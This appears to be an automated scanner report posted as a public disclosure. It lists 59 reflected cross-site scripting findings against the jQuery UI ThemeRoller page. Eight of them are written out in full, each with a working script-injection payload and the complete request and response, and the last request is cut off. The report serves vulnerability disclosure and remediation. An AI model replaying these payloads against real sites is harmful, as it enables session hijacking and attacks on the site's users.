Current Research | Full Disclosure | As of March 14, 2011

Report generated by Hoyt LLC at Fri Nov 19 17:35:54 CST 2010.


The DORK Report


1. Cross-site scripting (reflected)

1.1. http://jqueryui.com/themeroller/ [bgColorActive parameter]

1.2. http://jqueryui.com/themeroller/ [bgColorContent parameter]

1.3. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

1.4. http://jqueryui.com/themeroller/ [bgColorError parameter]

1.5. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

1.6. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

1.7. http://jqueryui.com/themeroller/ [bgColorHover parameter]

1.8. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

1.9. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

1.10. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

1.11. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

1.12. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

1.13. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

1.14. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

1.15. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

1.16. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

1.17. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

1.18. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

1.19. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

1.20. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

1.21. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

1.22. http://jqueryui.com/themeroller/ [bgTextureError parameter]

1.23. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

1.24. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

1.25. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

1.26. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

1.27. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

1.28. http://jqueryui.com/themeroller/ [borderColorActive parameter]

1.29. http://jqueryui.com/themeroller/ [borderColorContent parameter]

1.30. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

1.31. http://jqueryui.com/themeroller/ [borderColorError parameter]

1.32. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

1.33. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

1.34. http://jqueryui.com/themeroller/ [borderColorHover parameter]

1.35. http://jqueryui.com/themeroller/ [cornerRadius parameter]

1.36. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

1.37. http://jqueryui.com/themeroller/ [fcActive parameter]

1.38. http://jqueryui.com/themeroller/ [fcContent parameter]

1.39. http://jqueryui.com/themeroller/ [fcDefault parameter]

1.40. http://jqueryui.com/themeroller/ [fcError parameter]

1.41. http://jqueryui.com/themeroller/ [fcHeader parameter]

1.42. http://jqueryui.com/themeroller/ [fcHighlight parameter]

1.43. http://jqueryui.com/themeroller/ [fcHover parameter]

1.44. http://jqueryui.com/themeroller/ [ffDefault parameter]

1.45. http://jqueryui.com/themeroller/ [fsDefault parameter]

1.46. http://jqueryui.com/themeroller/ [fwDefault parameter]

1.47. http://jqueryui.com/themeroller/ [iconColorActive parameter]

1.48. http://jqueryui.com/themeroller/ [iconColorContent parameter]

1.49. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

1.50. http://jqueryui.com/themeroller/ [iconColorError parameter]

1.51. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

1.52. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

1.53. http://jqueryui.com/themeroller/ [iconColorHover parameter]

1.54. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

1.55. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

1.56. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

1.57. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

1.58. http://jqueryui.com/themeroller/ [opacityShadow parameter]

1.59. http://jqueryui.com/themeroller/ [thicknessShadow parameter]



1. Cross-site scripting (reflected)
There are 59 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://jqueryui.com/themeroller/ [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9362f"><script>alert(1)</script>7fddcf07157 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff9362f"><script>alert(1)</script>7fddcf07157&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:28:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ult=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff9362f"><script>alert(1)</script>7fddcf07157&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&border
...[SNIP]...

1.2. http://jqueryui.com/themeroller/ [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12ef6"><script>alert(1)</script>d355649fe6d was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff12ef6"><script>alert(1)</script>d355649fe6d&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
mal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff12ef6"><script>alert(1)</script>d355649fe6d&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderCo
...[SNIP]...

1.3. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b213"><script>alert(1)</script>37764a8a11e was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e61b213"><script>alert(1)</script>37764a8a11e&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e61b213"><script>alert(1)</script>37764a8a11e&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHo
...[SNIP]...

1.4. http://jqueryui.com/themeroller/ [bgColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67e9c"><script>alert(1)</script>31802c83066 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef167e9c"><script>alert(1)</script>31802c83066&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:30:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
12121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef167e9c"><script>alert(1)</script>31802c83066&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&
...[SNIP]...

1.5. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20197"><script>alert(1)</script>6c15c17f767 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c820197"><script>alert(1)</script>6c15c17f767&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ink rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c820197"><script>alert(1)</script>6c15c17f767&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&bord
...[SNIP]...

1.6. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e08a"><script>alert(1)</script>a833aec8e23 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea2e08a"><script>alert(1)</script>a833aec8e23&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
99999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea2e08a"><script>alert(1)</script>a833aec8e23&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&bor
...[SNIP]...

1.7. http://jqueryui.com/themeroller/ [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0f91"><script>alert(1)</script>76251dd2dbe was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadadad0f91"><script>alert(1)</script>76251dd2dbe&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadadad0f91"><script>alert(1)</script>76251dd2dbe&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aa
...[SNIP]...

1.8. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52c0c"><script>alert(1)</script>392fcb08d71 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa52c0c"><script>alert(1)</script>392fcb08d71&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
